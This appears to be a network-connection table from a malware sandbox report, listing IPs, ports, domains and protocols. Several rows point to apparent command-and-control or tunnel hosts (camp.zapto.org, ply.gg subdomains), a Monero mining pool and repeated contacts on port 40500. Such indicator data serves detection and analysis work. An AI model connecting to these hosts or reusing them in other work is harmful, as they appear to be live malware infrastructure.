| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| N/A | 127.0.0.1:8777 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| US | 8.8.8.8:53 | www.update.microsoft.com | udp |
| US | 20.109.209.108:80 | www.update.microsoft.com | tcp |
| RU | 185.215.113.206:80 | 185.215.113.206 | tcp |
| US | 8.8.8.8:53 | 108.209.109.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.113.215.185.in-addr.arpa | udp |
| US | 154.216.17.90:80 | tcp | |
| US | 147.185.221.22:49922 | educational-reform.gl.at.ply.gg | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| KZ | 95.59.33.46:40500 | tcp | |
| MX | 189.252.61.8:40500 | udp | |
| US | 8.8.8.8:53 | sanboxland.pro | udp |
| GB | 89.35.131.209:80 | sanboxland.pro | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| US | 8.8.8.8:53 | 8.61.252.189.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.131.35.89.in-addr.arpa | udp |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| CN | 1.94.204.34:4444 | tcp | |
| CN | 112.124.68.87:2222 | tcp | |
| HK | 43.226.125.43:10443 | tcp | |
| BG | 195.230.23.72:80 | tcp | |
| HK | 43.226.125.43:10443 | tcp | |
| BG | 195.230.23.72:80 | tcp | |
| CN | 39.106.152.236:11443 | tcp | |
| CN | 39.106.152.236:11443 | tcp | |
| US | 8.8.8.8:53 | ec2-18-166-176-228.ap-east-1.compute.amazonaws.com | udp |
| HK | 18.166.176.228:443 | ec2-18-166-176-228.ap-east-1.compute.amazonaws.com | tcp |
| HK | 18.166.176.228:443 | ec2-18-166-176-228.ap-east-1.compute.amazonaws.com | tcp |
| CN | 124.220.180.112:2087 | tcp | |
| CN | 124.220.180.112:2087 | tcp | |
| CN | 59.110.136.135:380 | tcp | |
| US | 8.8.8.8:53 | 43.125.226.43.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.176.166.18.in-addr.arpa | udp |
| NL | 38.180.123.95:3232 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| KZ | 88.204.209.230:40500 | udp | |
| CN | 59.110.136.135:380 | tcp | |
| RU | 185.215.113.209:80 | tcp | |
| US | 8.8.8.8:53 | 230.209.204.88.in-addr.arpa | udp |
| DE | 185.218.125.157:21441 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| IR | 188.209.32.217:40500 | tcp | |
| RU | 185.215.113.209:80 | 185.215.113.209 | tcp |
| US | 8.8.8.8:53 | adoring-lumiere.94-20-88-63.plesk.page | udp |
| BG | 195.230.23.72:80 | tcp | |
| AZ | 94.20.88.63:80 | adoring-lumiere.94-20-88-63.plesk.page | tcp |
| BG | 195.230.23.72:80 | tcp | |
| US | 8.8.8.8:53 | 63.88.20.94.in-addr.arpa | udp |
| US | 8.8.8.8:53 | paonancs.cn | udp |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| HK | 156.225.19.202:80 | paonancs.cn | tcp |
| AF | 149.54.35.210:40500 | udp | |
| RU | 185.215.113.67:21405 | tcp | |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| BG | 195.230.23.72:80 | tcp | |
| US | 147.185.221.23:58963 | login-donor.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | 210.35.54.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 202.19.225.156.in-addr.arpa | udp |
| RU | 80.66.75.114:80 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| MX | 201.108.200.21:40500 | udp | |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| US | 8.8.8.8:53 | 21.200.108.201.in-addr.arpa | udp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| RU | 185.215.113.209:80 | 185.215.113.209 | tcp |
| US | 8.8.8.8:53 | camp.zapto.org | udp |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| KZ | 178.89.183.83:40500 | udp | |
| US | 8.8.8.8:53 | 83.183.89.178.in-addr.arpa | udp |
| RU | 80.66.75.114:80 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| US | 154.216.17.90:80 | tcp | |
| AO | 129.122.183.25:40500 | udp | |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| US | 8.8.8.8:53 | 25.183.122.129.in-addr.arpa | udp |
| US | 185.199.110.133:443 | raw.githubusercontent.com | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| NL | 38.180.123.95:3232 | tcp | |
| US | 147.185.221.22:49922 | educational-reform.gl.at.ply.gg | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| UZ | 90.156.164.28:40500 | udp | |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 8.8.8.8:53 | 28.164.156.90.in-addr.arpa | udp |
| UZ | 195.158.22.210:40500 | tcp | |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| BG | 195.230.23.72:80 | tcp | |
| BG | 195.230.23.72:80 | tcp | |
| IR | 5.232.155.0:40500 | udp | |
| US | 8.8.8.8:53 | 0.155.232.5.in-addr.arpa | udp |
| RU | 185.215.113.67:21405 | tcp | |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| BG | 195.230.23.72:80 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| GB | 20.26.156.215:443 | github.com | tcp |
| BG | 195.230.23.72:80 | tcp | |
| BG | 195.230.23.72:80 | tcp | |
| UZ | 94.141.69.122:40500 | udp | |
| DE | 185.218.125.157:21441 | tcp | |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 122.69.141.94.in-addr.arpa | udp |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| US | 20.83.148.22:80 | tcp | |
| US | 185.199.110.133:443 | raw.githubusercontent.com | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| RU | 92.244.232.104:40500 | udp | |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| US | 8.8.8.8:53 | 104.232.244.92.in-addr.arpa | udp |
| DE | 185.218.125.157:21441 | tcp | |
| AF | 149.54.20.134:40500 | udp | |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 8.8.8.8:53 | 134.20.54.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | claywyaeropumps.com | udp |
| DE | 185.218.125.157:21441 | tcp | |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| NL | 38.180.123.95:3232 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| UZ | 90.156.160.54:40500 | udp | |
| DE | 185.218.125.157:21441 | tcp | |
| US | 8.8.8.8:53 | 54.160.156.90.in-addr.arpa | udp |
| US | 147.185.221.23:58963 | login-donor.gl.at.ply.gg | tcp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| CN | 183.57.21.131:8095 | tcp | |
| US | 147.185.221.22:49922 | educational-reform.gl.at.ply.gg | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| GT | 190.56.14.82:40500 | udp | |
| DE | 185.218.125.157:21441 | tcp | |
| IR | 46.248.34.105:40500 | tcp | |
| US | 8.8.8.8:53 | 82.14.56.190.in-addr.arpa | udp |
| DE | 185.218.125.157:21441 | tcp | |
| RU | 185.215.113.67:21405 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| UZ | 90.156.163.10:40500 | udp | |
| US | 8.8.8.8:53 | 10.163.156.90.in-addr.arpa | udp |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| BG | 195.230.23.72:80 | tcp | |
| BG | 195.230.23.72:80 | tcp | |
| RU | 94.230.44.71:40500 | udp | |
| BG | 195.230.23.72:80 | tcp | |
| BG | 195.230.23.72:80 | tcp | |
| US | 8.8.8.8:53 | 71.44.230.94.in-addr.arpa | udp |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| US | 154.216.17.90:80 | tcp | |
| BG | 195.230.23.72:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| RU | 185.215.113.209:80 | 185.215.113.209 | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| UZ | 86.62.3.67:40500 | udp | |
| GB | 20.26.156.215:443 | github.com | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| US | 8.8.8.8:53 | 67.3.62.86.in-addr.arpa | udp |
| DE | 185.218.125.157:21441 | tcp | |
| NL | 38.180.123.95:3232 | tcp | |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| MX | 189.141.139.39:40500 | udp | |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 39.139.141.189.in-addr.arpa | udp |
| DE | 185.218.125.157:21441 | tcp | |
| US | 185.199.110.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | camp.zapto.org | udp |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| YE | 94.26.219.44:40500 | udp | |
| RU | 185.215.113.43:80 | 185.215.113.43 | tcp |
| US | 8.8.8.8:53 | 44.219.26.94.in-addr.arpa | udp |
| DE | 185.218.125.157:21441 | tcp | |
| UZ | 89.249.62.7:40500 | tcp | |
| US | 147.185.221.22:49922 | educational-reform.gl.at.ply.gg | tcp |
| RU | 185.215.113.67:21405 | tcp | |
| RU | 185.215.113.43:80 | 185.215.113.43 | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| KZ | 88.204.241.182:40500 | udp | |
| N/A | 127.0.0.1:58963 | tcp | |
| US | 8.8.8.8:53 | 182.241.204.88.in-addr.arpa | udp |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 8.8.8.8:53 | funletters.net | udp |
| US | 208.122.221.162:80 | funletters.net | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| HK | 134.122.129.19:80 | 134.122.129.19 | tcp |
| US | 8.8.8.8:53 | 19.129.122.134.in-addr.arpa | udp |
| US | 185.199.110.133:443 | raw.githubusercontent.com | tcp |
| IR | 2.181.252.24:40500 | udp | |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| US | 147.185.221.23:58963 | login-donor.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | 24.252.181.2.in-addr.arpa | udp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| UZ | 217.30.162.244:40500 | udp | |
| US | 8.8.8.8:53 | 244.162.30.217.in-addr.arpa | udp |
| DE | 185.218.125.157:21441 | tcp | |
| NL | 38.180.123.95:3232 | tcp | |
| US | 185.199.110.133:443 | raw.githubusercontent.com | tcp |
| BG | 195.230.23.72:80 | tcp | |
| BG | 195.230.23.72:80 | tcp | |
| BG | 195.230.23.72:80 | tcp | |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| RU | 185.215.113.84:80 | 185.215.113.84 | tcp |
| BG | 195.230.23.72:80 | tcp | |
| UZ | 92.38.19.10:40500 | udp | |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 8.8.8.8:53 | 10.19.38.92.in-addr.arpa | udp |
| DE | 185.218.125.157:21441 | tcp | |
| BG | 195.230.23.72:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| RU | 185.215.113.209:80 | 185.215.113.209 | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| RU | 83.239.55.170:40500 | udp | |
| US | 8.8.8.8:53 | 170.55.239.83.in-addr.arpa | udp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 185.199.110.133:443 | raw.githubusercontent.com | tcp |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| NL | 178.132.2.10:4000 | tcp | |
| KZ | 178.91.167.50:40500 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| US | 147.185.221.22:49922 | educational-reform.gl.at.ply.gg | tcp |
| UZ | 195.158.18.194:40500 | udp | |
| RU | 185.215.113.67:21405 | tcp | |
| US | 8.8.8.8:53 | 194.18.158.195.in-addr.arpa | udp |
| DE | 185.218.125.157:21441 | tcp | |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| US | 154.216.17.90:80 | tcp | |
| KZ | 37.99.54.230:40500 | udp | |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| US | 8.8.8.8:53 | 230.54.99.37.in-addr.arpa | udp |
| US | 185.199.110.133:443 | raw.githubusercontent.com | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| SY | 77.44.198.123:40500 | udp | |
| DE | 185.218.125.157:21441 | tcp | |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| NL | 38.180.123.95:3232 | tcp | |
| US | 147.185.221.23:58963 | login-donor.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | 123.198.44.77.in-addr.arpa | udp |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| BG | 195.230.23.72:80 | tcp | |
| UZ | 89.236.218.158:40500 | udp | |
| US | 8.8.8.8:53 | 158.218.236.89.in-addr.arpa | udp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| BG | 195.230.23.72:80 | tcp | |
| CN | 150.158.37.254:80 | tcp | |
| BG | 195.230.23.72:80 | tcp | |
| BG | 195.230.23.72:80 | tcp | |
| NL | 89.110.69.103:80 | tcp | |
| KZ | 5.76.0.203:40500 | udp | |
| US | 8.8.8.8:53 | 203.0.76.5.in-addr.arpa | udp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 20.83.148.22:80 | tcp | |
| DE | 94.156.177.33:80 | 94.156.177.33 | tcp |
| NL | 89.110.69.103:80 | tcp | |
| RU | 185.215.113.66:80 | twizt.net | tcp |
| KZ | 31.171.185.170:40500 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| UZ | 93.188.85.2:40500 | udp | |
| US | 8.8.8.8:53 | 2.85.188.93.in-addr.arpa | udp |
| US | 147.185.221.22:49922 | educational-reform.gl.at.ply.gg | tcp |
| RU | 185.215.113.67:21405 | tcp | |
| CN | 150.158.37.254:80 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| BG | 195.230.23.72:80 | tcp | |
| RU | 185.215.113.66:80 | twizt.net | tcp |
| KG | 212.112.121.59:40500 | udp | |
| US | 8.8.8.8:53 | 59.121.112.212.in-addr.arpa | udp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 8.8.8.8:53 | camp.zapto.org | udp |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| TM | 91.202.233.141:80 | 91.202.233.141 | tcp |
| TM | 91.202.233.141:80 | 91.202.233.141 | tcp |
| US | 8.8.8.8:53 | 141.233.202.91.in-addr.arpa | udp |
| NL | 38.180.123.95:3232 | tcp | |
| IR | 46.167.149.255:40500 | udp | |
| US | 8.8.8.8:53 | 255.149.167.46.in-addr.arpa | udp |
| CN | 183.57.21.131:8095 | tcp | |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 147.185.221.23:58963 | login-donor.gl.at.ply.gg | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| UZ | 213.230.99.119:40500 | udp | |
| US | 8.8.8.8:53 | 119.99.230.213.in-addr.arpa | udp |
| DE | 185.218.125.157:21441 | tcp | |
| N/A | 127.0.0.1:9222 | tcp | |
| BG | 195.230.23.72:80 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| BG | 195.230.23.72:80 | tcp | |
| CN | 183.57.21.131:8095 | tcp | |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| BG | 195.230.23.72:80 | tcp | |
| MX | 189.167.22.36:40500 | udp | |
| KZ | 178.88.234.149:40500 | tcp | |
| US | 8.8.8.8:53 | 36.22.167.189.in-addr.arpa | udp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| BG | 195.230.23.72:80 | tcp | |
| RU | 185.215.113.67:21405 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| US | 147.185.221.22:49922 | educational-reform.gl.at.ply.gg | tcp |
| BG | 195.230.23.72:80 | tcp | |
| IR | 2.181.218.27:40500 | udp | |
| KR | 221.143.49.222:80 | 221.143.49.222 | tcp |
| US | 8.8.8.8:53 | 27.218.181.2.in-addr.arpa | udp |
| DE | 185.218.125.157:21441 | tcp | |
| N/A | 127.0.0.1:9222 | tcp | |
| US | 8.8.8.8:53 | 222.49.143.221.in-addr.arpa | udp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| NL | 38.180.123.95:3232 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| KR | 221.143.49.222:80 | 221.143.49.222 | tcp |
| SY | 178.253.109.195:40500 | udp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 8.8.8.8:53 | 195.109.253.178.in-addr.arpa | udp |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| UZ | 87.237.236.86:40500 | udp | |
| US | 8.8.8.8:53 | 86.236.237.87.in-addr.arpa | udp |
| KZ | 89.218.238.106:40500 | udp | |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| US | 8.8.8.8:53 | 106.238.218.89.in-addr.arpa | udp |
| DE | 185.218.125.157:21441 | tcp | |
| US | 8.8.8.8:53 | xmr-eu2.nanopool.org | udp |
| BG | 195.230.23.72:80 | tcp | |
| GB | 89.35.131.209:80 | sanboxland.pro | tcp |
| BG | 195.230.23.72:80 | tcp | |
| BG | 195.230.23.72:80 | tcp | |
| KG | 212.112.107.11:40500 | udp | |
| US | 8.8.8.8:53 | login-donor.gl.at.ply.gg | udp |
| US | 147.185.221.23:58963 | login-donor.gl.at.ply.gg | tcp |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| UA | 93.175.220.40:40500 | tcp | |
| US | 185.199.110.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | claywyaeropumps.com | udp |
| US | 147.185.221.22:49922 | educational-reform.gl.at.ply.gg | tcp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| RU | 185.215.113.67:21405 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| FR | 163.172.171.111:10343 | xmr-eu2.nanopool.org | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| AO | 102.219.187.80:40500 | udp | |
| DE | 185.218.125.157:21441 | tcp | |
| US | 8.8.8.8:53 | 111.171.172.163.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 80.187.219.102.in-addr.arpa | udp |
| DE | 185.218.125.157:21441 | tcp | |
| NL | 38.180.123.95:3232 | tcp | |
| BG | 195.230.23.72:80 | tcp | |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| KZ | 5.76.2.36:40500 | udp | |
| US | 8.8.8.8:53 | 36.2.76.5.in-addr.arpa | udp |
| BG | 195.230.23.72:80 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 185.199.110.133:443 | raw.githubusercontent.com | tcp |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| RU | 84.53.244.106:40500 | udp | |
| US | 8.8.8.8:53 | 106.244.53.84.in-addr.arpa | udp |
| N/A | 127.0.0.1:8777 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| RU | 78.36.17.105:40500 | udp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 8.8.8.8:53 | 105.17.36.78.in-addr.arpa | udp |
| TH | 154.197.69.165:443 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| TH | 154.197.69.165:443 | tcp | |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 8.8.8.8:53 | camp.zapto.org | udp |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| US | 20.83.148.22:80 | tcp | |
| TH | 154.197.69.165:443 | tcp | |
| KZ | 31.169.15.229:40500 | udp | |
| TH | 154.197.69.165:443 | tcp | |
| US | 8.8.8.8:53 | 229.15.169.31.in-addr.arpa | udp |
| N/A | 127.0.0.1:8777 | tcp | |
| TJ | 185.177.0.227:40500 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| RU | 185.215.113.67:21405 | tcp | |
| BG | 195.230.23.72:80 | tcp | |
| UZ | 217.30.164.185:40500 | udp | |
| DE | 185.218.125.157:21441 | tcp | |
| US | 8.8.8.8:53 | 185.164.30.217.in-addr.arpa | udp |
| US | 147.185.221.22:49922 | educational-reform.gl.at.ply.gg | tcp |
| NL | 38.180.123.95:3232 | tcp | |
| BG | 195.230.23.72:80 | tcp | |
| RU | 185.215.113.209:80 | 185.215.113.209 | tcp |
| N/A | 127.0.0.1:8777 | tcp | |
| RU | 185.215.113.66:80 | twizt.net | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| BG | 195.230.23.72:80 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| CN | 101.200.220.118:8090 | tcp | |
| MX | 187.235.150.54:40500 | udp | |
| US | 8.8.8.8:53 | 54.150.235.187.in-addr.arpa | udp |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| UZ | 90.156.162.48:40500 | udp | |
| US | 8.8.8.8:53 | 48.162.156.90.in-addr.arpa | udp |
| BG | 195.230.23.72:80 | tcp | |
| BG | 195.230.23.72:80 | tcp | |
| CN | 101.200.220.118:8090 | tcp | |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| TR | 85.103.235.188:40500 | udp | |
| DE | 185.218.125.157:21441 | tcp | |
| US | 8.8.8.8:53 | 188.235.103.85.in-addr.arpa | udp |
| DE | 185.218.125.157:21441 | tcp | |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| CN | 101.200.220.118:8090 | tcp | |
| IR | 185.123.69.47:40500 | udp | |
| US | 8.8.8.8:53 | 47.69.123.185.in-addr.arpa | udp |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| NL | 178.132.2.10:4000 | tcp | |
| DE | 193.161.193.99:25170 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| IR | 151.243.58.90:40500 | udp | |
| US | 8.8.8.8:53 | 90.58.243.151.in-addr.arpa | udp |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| US | 8.8.8.8:53 | camp.zapto.org | udp |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| UZ | 90.156.161.82:40500 | udp | |
| US | 8.8.8.8:53 | 82.161.156.90.in-addr.arpa | udp |
| DE | 193.161.193.99:25170 | tcp | |
| US | 26.185.184.104:942 | tcp | |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 147.185.221.22:49922 | educational-reform.gl.at.ply.gg | tcp |
| NL | 38.180.123.95:3232 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| DE | 193.161.193.99:25170 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| RU | 185.215.113.67:21405 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| UZ | 90.156.160.56:40500 | udp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| DE | 193.161.193.99:25170 | tcp | |
| US | 8.8.8.8:53 | 56.160.156.90.in-addr.arpa | udp |
| IR | 188.212.88.213:40500 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:9222 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 193.161.193.99:25170 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 193.161.193.99:25170 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| PK | 124.109.48.132:40500 | udp | |
| US | 147.185.221.22:49922 | educational-reform.gl.at.ply.gg | tcp |
| NL | 38.180.123.95:3232 | tcp | |
| US | 8.8.8.8:53 | 132.48.109.124.in-addr.arpa | udp |
| US | 147.185.221.23:58963 | login-donor.gl.at.ply.gg | tcp |
| US | 26.185.184.104:942 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| DE | 193.161.193.99:25170 | tcp | |
| KZ | 95.58.216.162:40500 | udp | |
| US | 8.8.8.8:53 | 162.216.58.95.in-addr.arpa | udp |
| DE | 185.218.125.157:21441 | tcp | |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| N/A | 127.0.0.1:8777 | tcp | |
